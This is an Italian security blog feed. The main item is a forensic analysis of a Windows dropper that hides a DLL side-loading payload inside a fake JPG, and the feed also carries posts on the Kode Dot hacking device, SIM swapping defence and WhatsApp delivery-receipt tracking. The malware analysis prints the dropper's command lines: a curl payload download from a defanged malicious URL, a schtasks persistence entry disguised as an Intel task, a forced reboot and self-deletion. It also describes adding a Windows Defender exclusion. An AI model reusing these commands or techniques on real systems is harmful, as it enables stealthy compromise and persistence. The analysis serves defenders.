<p>Una volta ottenuti i privilegi, il malware aggiunge la propria directory di lavoro alle <strong>esclusioni di Windows Defender</strong>. Tradotto: tutto ciò che eseguirà da quella cartella non sarà mai più scansionato. È una mossa elegante e devastante allo stesso tempo. La cartella, peraltro, viene creata in <code>%LOCALAPPDATA%\Microsoft\</code> con uno spazio iniziale nel nome, trucco che la rende quasi invisibile a colpo d&#8217;occhio nelle interfacce standard.</p>
<h3 id="3-download-del-payload-mascherato-da-jpg">3. Download del payload mascherato da JPG</h3>
<pre><code>"%SYSTEMROOT%\System32\curl.exe" -s -L --connect-timeout 15 --max-time 120 -o "!jpg_file!" "!url!"</code></pre>
<p>Il payload viene scaricato sfruttando <strong>curl.exe</strong>, un binario perfettamente legittimo presente nativamente in Windows da diversi anni. Questa tecnica si chiama <em>Living Off the Land</em> (LOLBins) e consiste nell&#8217;utilizzare strumenti già presenti sul sistema per non dover introdurre eseguibili sospetti. Il file scaricato ha estensione <code>.jpg</code>, ma — sorpresa — non è un&#8217;immagine.</p>
<h3 id="4-estrazione-dellarchivio-camuffato">4. Estrazione dell&#8217;archivio camuffato</h3>
<pre><code>tar -xf "!zip_file!" -C "!install_dir!"</code></pre>
<p>Il finto JPG viene rinominato in <code>.zip</code> ed estratto con <strong>tar</strong>, anch&#8217;esso ormai presente di default in Windows. All&#8217;interno dell&#8217;archivio si trovano due file: una <strong>DLL</strong> e un <strong>binario eseguibile</strong>, classico schema per sfruttare una vulnerabilità di tipo <em>DLL side-loading</em> (di cui parlerò più avanti).</p>
<h3 id="5-persistenza-tramite-scheduled-task">5. Persistenza tramite Scheduled Task</h3>
<pre><code>schtasks /create /tn "\Microsoft\Windows\IntelGraphicsTask" /xml "!xml_file!" /f</code></pre>
<p>Per garantire la persistenza, il malware crea uno <strong>scheduled task</strong> con un nome che imita perfettamente quelli legittimi di sistema (<em>IntelGraphicsTask</em>). Il task è configurato per partire al logon dell&#8217;utente, con un delay di 30 secondi e flag <code>Hidden=true</code>. <strong>Anche un occhio esperto, a una prima occhiata, non si insospettirebbe.</strong></p>
<h3 id="6-riavvio-forzato-e-autodistruzione">6. Riavvio forzato e autodistruzione</h3>
<pre><code>shutdown /r /t 60 /f
start /b cmd /c "ping 127.0.0.1 -n 3 &gt;nul &amp; del /f /q "%~f0""</code></pre>
<p>Il colpo finale: il sistema viene riavviato forzatamente in 60 secondi (per finalizzare l&#8217;installazione e attivare lo scheduled task) e il file <code>.cmd</code> originale si autodistrugge. Il <code>ping</code> verso localhost è un trucco antico ma efficace: serve solo come &#8220;sleep&#8221; per dare il tempo allo script di terminare prima di cancellarsi.</p>
<h2 id="il-finto-jpg-quando-limmagine-non-e-unimmagine">Il finto JPG: quando l&#8217;immagine non è un&#8217;immagine</h2>
<p>La parte più interessante, almeno dal punto di vista didattico, riguarda il file scaricato. L&#8217;URL accorciato (<code>hxxps://is[.]gd/cjIjvU</code>) reindirizza a un dominio dal nome volutamente innocuo: <code>associatecountrynotifications[.]digital</code>. Il file scaricato ha estensione <code>.jpg</code> e, tentando di aprirlo con un visualizzatore di immagini, restituisce semplicemente un errore &#8220;formato non supportato&#8221;.</p>
<p>Rinominandolo in <code>.zip</code>, però, l&#8217;archivio si apre senza problemi e al suo interno troviamo i due file di cui parlavo prima: una <strong>DLL</strong> e un <strong>eseguibile</strong>. <strong>È esattamente la tecnica del DLL side-loading</strong>: l&#8217;eseguibile sembra (e in parte è) legittimo, ma carica una DLL malevola posizionata nella stessa cartella, sfruttando il modo in cui Windows risolve le dipendenze.</p>
<p><a href="https://luca-mercatanti.com/wp-content/uploads/2026/04/url-reale.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-35823" src="https://luca-mercatanti.com/wp-content/uploads/2026/04/url-reale.png" alt="" width="744" height="308" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/04/url-reale.png 744w, https://luca-mercatanti.com/wp-content/uploads/2026/04/url-reale-300x124.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/04/url-reale-380x157.png 380w" sizes="auto, (max-width: 744px) 100vw, 744px" /></a></p>
<p>L&#8217;analisi statica con <a href="https://www.winitor.com/download2" target="_blank" rel="noopener">PEStudio</a> rivela diverse cose interessanti:</p>
<ul>
<li><strong>78 red flag</strong> identificati nella sola DLL;</li>
<li>nessuna reputazione su VirusTotal (segno di un sample fresco di giornata);</li>
<li>numerose <strong>funzioni duplicate</strong> negli import, una tecnica classica per confondere analisti e tool automatici;</li>
<li>un <strong>compile time</strong> volutamente alterato e riportato a un&#8217;epoca in cui certi software non esistevano ancora — un piccolo &#8220;Ritorno al Futuro&#8221; pensato per ingannare le timeline forensi.</li>
</ul>
<p><a href="https://luca-mercatanti.com/wp-content/uploads/2026/04/pestudio.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-35824" src="https://luca-mercatanti.com/wp-content/uploads/2026/04/pestudio.png" alt="" width="255" height="612" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/04/pestudio.png 255w, https://luca-mercatanti.com/wp-content/uploads/2026/04/pestudio-125x300.png 125w" sizes="auto, (max-width: 255px) 100vw, 255px" /></a></p>
<h2 id="cosa-ci-insegna-questo-caso">Cosa ci insegna questo caso</h2>
<p>Al di là della componente tecnica, questo malware è un piccolo manuale di tutto ciò che oggi rende efficace un attacco moderno. <strong>Non c&#8217;è nessun exploit zero-day, nessuna magia nera, nessuna tecnica esoterica.</strong> Ci sono solo strumenti già presenti nel sistema operativo (curl, tar, PowerShell, schtasks), uno script ben scritto e qualche trucco di camuffamento. Eppure il risultato è una compromissione completa, persistente e quasi invisibile.</p>
<p>I tre punti che mi sembra utile fissare per chi legge sono:</p>
<ul>
<li><strong>Le estensioni dei file mentono.</strong> Un <code>.jpg</code> può essere uno zip, uno zip può contenere un eseguibile, un eseguibile può caricare una DLL malevola. Mai fidarsi di ciò che si vede a colpo d&#8217;occhio.</li>
<li><strong>Le esclusioni di Windows Defender sono un&#8217;arma a doppio taglio.</strong> Se un processo riesce ad aggiungerne una, sopratutto con privilegi amministrativi, da quel momento in poi l&#8217;antivirus è cieco su quella cartella.</li>
<li><strong>Gli scheduled task sono il vero &#8220;Vecchio Trucco&#8221; della persistenza moderna.</strong> Un task con nome plausibile, eseguito in background con flag <code>Hidden</code>, è praticamente invisibile a chi non sa cosa cercare.</li>
</ul>
<h2 id="come-difendersi-concretamente">Come difendersi (concretamente)</h2>
<p>Le buone pratiche, in casi come questo, sono sempre le stesse — ma vale la pena ripeterle:</p>
<ul>
<li><strong>Disabilitare l&#8217;esecuzione automatica di script <code>.cmd</code>, <code>.bat</code>, <code>.vbs</code>, <code>.js</code></strong> da parte di utenti standard tramite policy di gruppo.</li>
<li><strong>Limitare i privilegi amministrativi</strong>: l&#8217;utente quotidiano non dovrebbe mai operare come admin. È una banalità, eppure nel 90% degli ambienti aziendali che mi capita di analizzare, troviamo l&#8217;esatto contrario.</li>
<li><strong>Monitorare le modifiche alle esclusioni di Windows Defender</strong> tramite log di sistema (l&#8217;evento <code>5007</code> è il vostro miglior amico).</li>
<li><strong>Auditare periodicamente gli scheduled task</strong>, soprattutto quelli creati di recente e con nomi che mimano servizi di sistema.</li>
<li><strong>Educare gli utenti</strong> a non aprire mai file ricevuti da email anche solo lievemente sospette, soprattutto quando contengono link accorciati o redirezioni.</li>
</ul>
<p>Il caso analizzato da Zoziel Pinto Freire è un piccolo gioiello didattico, che consiglio a tutti di leggere nella versione integrale (<a href="https://securityaffairs.com/190358/hacking/image-or-malware-read-until-the-end-and-answer-in-comments.html" target="_blank" rel="noopener">qui il link originale su Security Affairs</a>) per chi volesse vedere screenshot, IoC e dettagli di esecuzione live in macchina virtuale. Per quanto mi riguarda, la morale è sempre la stessa: <strong>nel 2026 la differenza tra un&#8217;immagine e un malware può essere semplicemente il modo in cui guardiamo il file.</strong></p>
<p>L'articolo <a href="https://luca-mercatanti.com/malware-nascosto-in-un-finto-jpg-analisi-forense-di-un-attacco-moderno/">Malware nascosto in un finto JPG: analisi forense di un attacco moderno</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://luca-mercatanti.com/malware-nascosto-in-un-finto-jpg-analisi-forense-di-un-attacco-moderno/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kode Dot: un hacking tool successore del Flipper Zero</title>
		<link>https://luca-mercatanti.com/kode-dot-hacking/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=kode-dot-hacking</link>
					<comments>https://luca-mercatanti.com/kode-dot-hacking/#respond</comments>
		
		<dc:creator><![CDATA[Luca Mercatanti]]></dc:creator>
		<pubDate>Tue, 21 Apr 2026 17:25:21 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">https://luca-mercatanti.com/?p=35744</guid>

					<description><![CDATA[<p>Correva l&#8217;Agosto 2022 quando vi parlai per la prima volta del Flipper Zero, dispositivo di Hacking e Sicurezza&#8230;</p>
<p>L'articolo <a href="https://luca-mercatanti.com/kode-dot-hacking/">Kode Dot: un hacking tool successore del Flipper Zero</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Correva l&#8217;Agosto 2022 quando <a href="https://luca-mercatanti.com/flipper-zero/">vi parlai per la prima</a> volta del Flipper Zero, dispositivo di Hacking e Sicurezza Informatica divenuto famoso in tutto il mondo negli ultimi anni. Nei prossimi mesi, un nuovo prodotto potrebbe prendere il posto del più famoso &#8220;coltellino svizzero&#8221; per l&#8217;hacking: <a href="https://www.kickstarter.com/projects/kode/kode-dot-the-all-in-one-pocket-size-maker-device/description"><strong>Kode Dot</strong></a>.</p>



<h2 id="caratteristiche-principali-e-funzionalita-avanzate-di-kode-dot" class="wp-block-heading">Caratteristiche principali e funzionalità avanzate di Kode Dot</h2>



<p>Kode Dot si basa su un <strong>microcontrollore ESP32-S3 dual-core</strong>, dotato di 32MB di memoria flash e 8MB di PSRAM, che offre potenza di calcolo elevata e ampia capacità di memoria per gestire applicazioni complesse. Questo hardware di fascia alta rende Kode Dot un dispositivo performante, in grado di supportare multitasking e funzionalità avanzate, tra cui l&#8217;utilizzo dei modelli LLM per il coding (sì, avete letto bene: Kode Dot permetterà di scrivere codice mediante l&#8217;utilizzo dell&#8217;AI).<br>Rispetto al Flipper, è dotato di un <strong>display AMOLED a colori da 2,13 pollici</strong> con risoluzione 392&#215;410 pixel, che garantisce immagini nitide e una user experience molto più coinvolgente.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="680" height="680" src="https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_3.webp" alt="" class="wp-image-35795" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_3.webp 680w, https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_3-300x300.webp 300w, https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_3-150x150.webp 150w, https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_3-80x80.webp 80w, https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_3-110x110.webp 110w, https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_3-380x380.webp 380w" sizes="auto, (max-width: 680px) 100vw, 680px" /></figure>
</div>


<p>Dal punto di vista della connettività, Kode Dot integra nativamente <strong>NFC e RFID</strong> per la lettura e l’emulazione di tag a 125 kHz, insieme a un <strong>trasmettitore e ricevitore a infrarossi</strong> per controllare dispositivi compatibili. A completare il pacchetto hardware, avendo il <a href="https://www.kickstarter.com/projects/kode/kode-dot-the-all-in-one-pocket-size-maker-device/description">Kickstarter</a> superato i 2 milioni di Dollari, è stato inserito all&#8217;interno del dispositivo un modulo (prima accessorio) che estende le capacità radio con supporto a <em>Wi-Fi dual-band (2.4/5 GHz)</em>, frequenze <em>Sub-GHz</em> e protocolli <em>NRF24</em>, consentendo sniffing, analisi e pentesting avanzato.</p>



<p>Tra i sensori integrati spiccano un&nbsp;<strong>accelerometro a 9 assi</strong>&nbsp;e un&nbsp;<strong>microfono MEMS</strong>, che ampliano le possibilità di interazione e rilevamento ambientale. L’alimentazione è affidata a una&nbsp;<strong>batteria Li-Po da 500mAh</strong>, gestita da un controller energetico BQ25896 che ottimizza autonomia e sicurezza di ricarica. Per migliorare l’esperienza utente, è presente un motore di vibrazione che fornisce feedback tattile immediato.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="680" height="680" src="https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_4.webp" alt="" class="wp-image-35796" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_4.webp 680w, https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_4-300x300.webp 300w, https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_4-150x150.webp 150w, https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_4-80x80.webp 80w, https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_4-110x110.webp 110w, https://luca-mercatanti.com/wp-content/uploads/2026/04/kode_dot_4-380x380.webp 380w" sizes="auto, (max-width: 680px) 100vw, 680px" /></figure>
</div>


<p>Il software si basa su&nbsp;<strong>kodeOS</strong>, un sistema operativo personalizzato e modulare che gestisce app e funzionalità in modo fluido. La programmazione è estremamente flessibile, con supporto per ambienti consolidati come&nbsp;<em>Arduino IDE, PlatformIO</em>&nbsp;e&nbsp;<em>ESP-IDF</em>, permettendo agli sviluppatori di creare applicazioni su misura. Infine, Kode Dot integra comandi vocali AI grazie a modelli come&nbsp;<strong>OpenAI ChatGPT</strong>&nbsp;e&nbsp;<strong>Google Gemini</strong>, offrendo assistenza intelligente direttamente dal dispositivo.</p>



<h2 id="vantaggi-di-kode-dot-rispetto-al-flipper-zero-e-altri-strumenti-simili" class="wp-block-heading">Vantaggi di Kode Dot rispetto al Flipper Zero e altri strumenti simili</h2>



<p>Kode Dot rappresenta molto più di un semplice upgrade rispetto al Flipper Zero: è un salto tecnologico significativo. Il <strong>display AMOLED a colori</strong> di alta qualità porta un’interfaccia utente più ricca, leggibile e personalizzabile, superando la limitazione del tradizionale schermo monocromatico di Flipper Zero.<br>Il microcontrollore ESP32-S3 dual-core, con maggiore potenza e memoria, consente l’esecuzione di applicazioni più complesse e multitasking efficiente, migliorando le prestazioni complessive. Dal punto di vista software, <strong>kodeOS</strong> introduce un sistema operativo modulare che integra intelligenze artificiali come OpenAI ChatGPT e Google Gemini, offrendo funzionalità vocali e assistenza intelligente del tutto assenti nel Flipper Zero.</p>



<h2 id="costi-e-spedizione" class="wp-block-heading">Costi e spedizione</h2>



<p>Nel momento in cui scrivo, ho acquistato un Kode Dot con scocca trasparente (edizione limitata ai finanziatori su Kickstarter)<strong> al costo di 149 Dollari</strong> e la spedizione è prevista per Giugno 2026. Al momento, però, non vi sono novità in merito alla produzione. Da risolvere sarà anche la questione relativa al modulo esterno per il &#8220;Wi-Fi Hacking&#8221;: molti utenti che avevano acquistato il modulo WiFi avanzato, si ritrovano ad aver sostenuto una spesa inutile, essendo queste funzioni state integrate direttamente all&#8217;interno del Kode Dot senza necessità di accessori esterni.</p>
<p>L'articolo <a href="https://luca-mercatanti.com/kode-dot-hacking/">Kode Dot: un hacking tool successore del Flipper Zero</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://luca-mercatanti.com/kode-dot-hacking/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>SIM Swapping: la guida completa e come difendersi</title>
		<link>https://luca-mercatanti.com/sim-swapping-la-guida-completa-e-come-difendersi/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=sim-swapping-la-guida-completa-e-come-difendersi</link>
					<comments>https://luca-mercatanti.com/sim-swapping-la-guida-completa-e-come-difendersi/#respond</comments>
		
		<dc:creator><![CDATA[Luca Mercatanti]]></dc:creator>
		<pubDate>Fri, 30 Jan 2026 18:24:32 +0000</pubDate>
				<category><![CDATA[Sicurezza Informatica]]></category>
		<guid isPermaLink="false">https://luca-mercatanti.com/?p=35766</guid>

					<description><![CDATA[<p>Il Sim Swapping è una forma sofisticata di furto d’identità mediante la &#8220;clonazione&#8221; del numero di telefono e,&#8230;</p>
<p>L'articolo <a href="https://luca-mercatanti.com/sim-swapping-la-guida-completa-e-come-difendersi/">SIM Swapping: la guida completa e come difendersi</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p><strong>Il Sim Swapping è una forma sofisticata di furto d’identità mediante la &#8220;clonazione&#8221; del numero di telefono</strong> e, di conseguenza, di tutti gli account online associati. In sostanza, un attaccante riesce a trasferire un numero di telefono su una nuova SIM, ottenendo così il controllo delle chiamate, degli SMS e dei codici di autenticazione a due fattori (2FA) inviati. Questo meccanismo consente agli attaccanti di bypassare molte delle protezioni standard che vengono quotidianamente utilizzate per proteggere l&#8217;identità digitale.</p>



<p>In questa guida completa, cercherò di spiegare nel dettaglio cos&#8217;è il Sim Swapping, come avvengono gli attacchi, quali rischi comporta e come riconoscerne i segnali. Infine, cercheremo di capire quali possano essere delle strategie efficaci e consigli pratici per prevenire questo tipo di frode e reagire tempestivamente in caso di attacco.</p>



<h2 id="cose-il-sim-swapping-e-come-funziona" class="wp-block-heading">Cos&#8217;è il Sim Swapping e come funziona</h2>



<h3 id="definizione-e-meccanismo-di-funzionamento-del-sim-swapping" class="wp-block-heading">Definizione e meccanismo di funzionamento del Sim Swapping</h3>



<p>Il <strong>Sim Swapping</strong>, o “<strong>scambio della SIM</strong>”, è un attacco informatico che consiste nel trasferimento fraudolento del numero di telefono su una nuova scheda SIM controllata dal truffatore. In pratica, il criminale convince l’operatore telefonico a disattivare la SIM originale e ad attivare una nuova SIM con lo stesso numero, che poi inserisce nel proprio dispositivo.</p>



<p>Il numero di telefono è un elemento chiave per la sicurezza digitale, perché spesso viene usato come secondo <a href="https://it.wikipedia.org/wiki/Autenticazione_a_due_fattori">fattore di autenticazione (2FA)</a> per accedere a servizi online come email, social media, conti bancari e wallet di criptovalute. Attraverso l’accesso ai messaggi SMS o alle chiamate indirizzate al tuo numero, l’attaccante può intercettare codici temporanei necessari per completare l’accesso, aggirando così la protezione offerta dall’autenticazione a due fattori basata sugli SMS.</p>



<p>Gli operatori telefonici, soggetti a regolamentazioni di enti come Agcom, gestiscono la portabilità del numero e la sostituzione delle SIM. Purtroppo, in alcuni casi, le procedure di verifica dell’identità sono insufficientemente rigorose o vulnerabili, permettendo ai truffatori di ottenere una nuova SIM a loro nome usando documenti falsificati o attraverso tecniche di ingegneria sociale (social engineering).</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="559" src="https://luca-mercatanti.com/wp-content/uploads/2026/01/funzionamento-sim-swapping-1024x559.png" alt="Funzionamento SIM Swapping" class="wp-image-35767" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/01/funzionamento-sim-swapping-1024x559.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2026/01/funzionamento-sim-swapping-300x164.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/01/funzionamento-sim-swapping-768x419.png 768w, https://luca-mercatanti.com/wp-content/uploads/2026/01/funzionamento-sim-swapping-380x207.png 380w, https://luca-mercatanti.com/wp-content/uploads/2026/01/funzionamento-sim-swapping-800x436.png 800w, https://luca-mercatanti.com/wp-content/uploads/2026/01/funzionamento-sim-swapping-1160x633.png 1160w, https://luca-mercatanti.com/wp-content/uploads/2026/01/funzionamento-sim-swapping.png 1408w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Schema di funzionamento del SIM Swapping</figcaption></figure>



<h3 id="come-avviene-un-attacco-di-sim-swapping-tecniche-e-modalita" class="wp-block-heading">Come avviene un attacco di Sim Swapping: tecniche e modalità</h3>



<p>Gli attacchi di Sim Swapping si basano prevalentemente su <a href="https://it.wikipedia.org/wiki/Ingegneria_sociale">tecniche di social engineering</a>, ovvero manipolazioni psicologiche che inducono gli operatori telefonici a rilasciare la SIM a persone non autorizzate. L’attaccante, in linea di principio, si finge il titolare della SIM, convincendo il personale dell’operatore a effettuare la portabilità del numero su una nuova SIM.</p>



<ul class="wp-block-list">
<li><strong>Documenti falsificati:</strong> spesso vengono prodotti documenti d’identità contraffatti per supportare la richiesta di cambio SIM. Con l&#8217;utilizzo dell&#8217;intelligenza artificiale o di strumenti ormai alla portata di chiunque, è possibile produrre una copia esatta di documenti reali.</li>



<li><strong>Complici interni:</strong> in alcuni casi, dipendenti degli operatori telefonici collaborano con i truffatori facilitando la frode.</li>



<li><strong>Sfruttamento di vulnerabilità di rete:</strong> il protocollo SS7, utilizzato per instradare chiamate e SMS, presenta falle che permettono di intercettare comunicazioni senza sostituire fisicamente la SIM.</li>
</ul>



<h2 id="vulnerabilita-del-protocollo-ss7" class="wp-block-heading">Vulnerabilità del protocollo SS7</h2>



<p>Oltre alla richiesta di una nuova SIM fisica con le tecniche di cui sopra abbiamo discusso, è possibile anche che l’attacco di <strong>SIM Swapping</strong> avvenga sfruttando falle di sicurezza intrinseche nei protocolli di segnalazione utilizzati per il funzionamento delle reti di telefonia mobile.</p>



<p>In particolare, le reti cellulari si basano su protocolli di segnalazione pensati storicamente per garantire interoperabilità tra operatori a livello globale, ma non progettati con un modello di sicurezza “zero trust”. Uno degli esempi più noti è il protocollo SS7 (Signaling System No. 7), ancora oggi utilizzato, seppur affiancato da tecnologie più recenti, per la gestione di operazioni critiche come l’instradamento delle chiamate, degli SMS e la gestione della mobilità dell’utente tra celle e reti diverse. SS7 nasce in un’epoca in cui si dava per scontato che solo soggetti fidati (gli operatori) avessero accesso alla rete di segnalazione; questo presupposto, oggi, non è più valido.</p>



<p><strong>Un attaccante che riesca ad accedere, direttamente o indirettamente, alla rete di segnalazione può interrogare il sistema per ottenere informazioni sulla posizione dell’utente, intercettare SMS o reindirizzare il traffico di segnalazione verso nodi controllati.</strong> In questo scenario, il numero di telefono della vittima può essere “dirottato” logicamente senza che vi sia una vera e propria emissione di una nuova SIM fisica.<br>Dal punto di vista dell’utente, il risultato è analogo a quello di un SIM swap classico:<strong> il telefono perde improvvisamente la rete, mentre l’attaccante inizia a ricevere chiamate e messaggi, inclusi i codici OTP inviati via SMS.</strong></p>



<p>Anche i protocolli successivi, come Diameter, introdotti per le reti LTE e 5G, pur migliorando alcuni aspetti di sicurezza, non sono immuni da configurazioni errate, implementazioni incomplete o esposizioni indebite di interfacce di segnalazione. In presenza di tali condizioni, un soggetto malevolo può sfruttare l’accesso alla segnalazione per forzare eventi di aggiornamento dell’utenza, modificare temporaneamente l’associazione tra numero e profilo di rete, o abusare delle procedure di autenticazione tra reti visitate e rete “home”.</p>



<h2 id="segnali-e-sintomi-di-un-attacco-di-sim-swapping" class="wp-block-heading">Segnali e sintomi di un attacco di Sim Swapping</h2>



<h3 id="perdita-improvvisa-di-servizio-mobile" class="wp-block-heading">Perdita improvvisa di servizio mobile</h3>



<p>Il segnale più evidente di un attacco di Sim Swapping è la <strong>perdita improvvisa di segnale o la disconnessione dal servizio mobile, anche se il telefono non presenta problemi tecnici.</strong> Questo avviene perché la tua SIM è stata sostituita e il numero è attivo su un altro dispositivo.</p>



<p>Altri segnali di allarme includono addebiti o transazioni non riconosciute sul conto telefonico o bancario, SMS o chiamate di conferma per operazioni che non hai effettuato, e notifiche di modifiche password o accessi non autorizzati ai tuoi servizi finanziari.</p>



<h2 id="come-proteggersi-dal-sim-swapping-strategie-e-misure-di-sicurezza" class="wp-block-heading">Come proteggersi dal Sim Swapping: strategie e misure di sicurezza</h2>



<h3 id="autenticazione-a-due-fattori-preferire-app-o-hardware-token" class="wp-block-heading">Autenticazione a due fattori: preferire app o hardware token</h3>



<p><strong>L’autenticazione a due fattori basata sugli SMS è vulnerabile al Sim Swapping.</strong> Per questo motivo, ti consigliamo di utilizzare app di autenticazione come Google Authenticator o Authy, che generano codici temporanei direttamente sul dispositivo, senza passare tramite la rete mobile.</p>



<p></p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="591" src="https://luca-mercatanti.com/wp-content/uploads/2026/01/image-1024x591.png" alt="Token hardware di Google" class="wp-image-35769" srcset="https://luca-mercatanti.com/wp-content/uploads/2026/01/image-1024x591.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2026/01/image-300x173.png 300w, https://luca-mercatanti.com/wp-content/uploads/2026/01/image-768x444.png 768w, https://luca-mercatanti.com/wp-content/uploads/2026/01/image-1536x887.png 1536w, https://luca-mercatanti.com/wp-content/uploads/2026/01/image-2048x1183.png 2048w, https://luca-mercatanti.com/wp-content/uploads/2026/01/image-380x219.png 380w, https://luca-mercatanti.com/wp-content/uploads/2026/01/image-800x462.png 800w, https://luca-mercatanti.com/wp-content/uploads/2026/01/image-1160x670.png 1160w, https://luca-mercatanti.com/wp-content/uploads/2026/01/image.png 2180w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<p>Per una protezione ancora più robusta, è possibile adottare dispositivi hardware come YubiKey o <a href="https://store.google.com/it/product/titan_security_key?hl=it&amp;selections=eyJwcm9kdWN0RmFtaWx5IjoiWkdWMmFXTmxYMlpoYldsc2VWOWZkR2wwWVc1ZmMyVmpkWEpwZEhsZmEyVjUifQ%3D%3D">Google Titan Security Keys</a>, che richiedono la presenza fisica del token per autorizzare l’accesso agli account. Questi strumenti rappresentano una barriera efficace contro gli attacchi remoti come il Sim Swapping, anche se <strong>possono risultare problematici da usare, in quanto è richiesta la disponibilità fisica di un dispositivo hardware per l&#8217;autenticazione.</strong></p>



<h3 id="impostare-pin-e-blocchi-di-portabilita-con-loperatore" class="wp-block-heading">Impostare PIN e blocchi di portabilità con l’operatore</h3>



<p>Molti operatori telefonici offrono la possibilità di impostare un PIN di sicurezza e blocchi specifici per la portabilità della SIM. Queste misure rallentano o impediscono la sostituzione fraudolenta, perché senza il PIN corretto non è possibile effettuare la portabilità o la sostituzione della SIM.</p>



<h2 id="come-reagire-se-si-e-vittima-di-sim-swapping" class="wp-block-heading">Come reagire se si è vittima di Sim Swapping</h2>



<h3 id="azioni-immediate-contattare-loperatore-e-cambiare-password" class="wp-block-heading">Azioni immediate: contattare l’operatore e cambiare password</h3>



<p>Se sospetti di essere vittima di Sim Swapping, contatta immediatamente il tuo operatore telefonico per bloccare la SIM fraudolenta e ripristinare la tua. <strong>L’operatore può fermare qualsiasi nuova portabilità e mettere in sicurezza il tuo numero.</strong><br>Contestualmente, cambia le password di tutti gli account collegati al tuo numero. <strong>Inutile dire di scegliere password forti</strong> e uniche per ogni servizio per limitare i danni e prevenire ulteriori accessi non autorizzati.</p>
<p>L'articolo <a href="https://luca-mercatanti.com/sim-swapping-la-guida-completa-e-come-difendersi/">SIM Swapping: la guida completa e come difendersi</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://luca-mercatanti.com/sim-swapping-la-guida-completa-e-come-difendersi/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Tracciare gli utenti su WhatsApp usando le ricevute di consegna</title>
		<link>https://luca-mercatanti.com/tracciare-gli-utenti-su-whatsapp-usando-le-ricevute-di-consegna/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tracciare-gli-utenti-su-whatsapp-usando-le-ricevute-di-consegna</link>
					<comments>https://luca-mercatanti.com/tracciare-gli-utenti-su-whatsapp-usando-le-ricevute-di-consegna/#comments</comments>
		
		<dc:creator><![CDATA[Luca Mercatanti]]></dc:creator>
		<pubDate>Tue, 30 Dec 2025 23:40:44 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">https://luca-mercatanti.com/?p=35747</guid>

					<description><![CDATA[<p>In questi giorni mi sono imbattuto in un paper su Arxiv.gov dal titolo &#8220;Careless Whisper: sfruttare le ricevute&#8230;</p>
<p>L'articolo <a href="https://luca-mercatanti.com/tracciare-gli-utenti-su-whatsapp-usando-le-ricevute-di-consegna/">Tracciare gli utenti su WhatsApp usando le ricevute di consegna</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>In questi giorni mi sono imbattuto in un paper su Arxiv.gov dal titolo &#8220;<em><a href="https://arxiv.org/abs/2411.11194">Careless Whisper: sfruttare le ricevute di consegna silenziose per monitorare gli utenti sui servizi di messaggistica istantanea per dispositivi mobili</a></em>&#8220;. Il paper analizza una vulnerabilità di privacy presente in alcune app di messaggistica istantanea molto diffuse, in particolare WhatsApp e Signal.<br>In sintesi, <strong>gli autori mostrano che le spunte di conferma di consegna dei messaggi possono essere sfruttati come tecnica per monitorare un utente senza che questo riceva alcuna notifica</strong>.</p>



<p>Grazie all&#8217;utilizzo di messaggi appositamente costruiti (come reazioni, modifiche o cancellazioni), è possibile forzare la generazione di ricevute di consegna invisibili all’utente e, <strong>analizzando il tempo di risposta (RTT) di queste ricevute, un attaccante può ottenere informazioni utili</strong>, ad esempio all&#8217;interno di un contesto OSINT, tra cui: </p>



<ul class="wp-block-list">
<li>se lo schermo del telefono è acceso o spento</li>



<li>se l’app di messaggistica è in primo piano</li>



<li>gli orari di attività e inattività quotidiani</li>



<li>la presenza e lo stato di più dispositivi collegati allo stesso account (smartphone, web client, desktop)</li>
</ul>



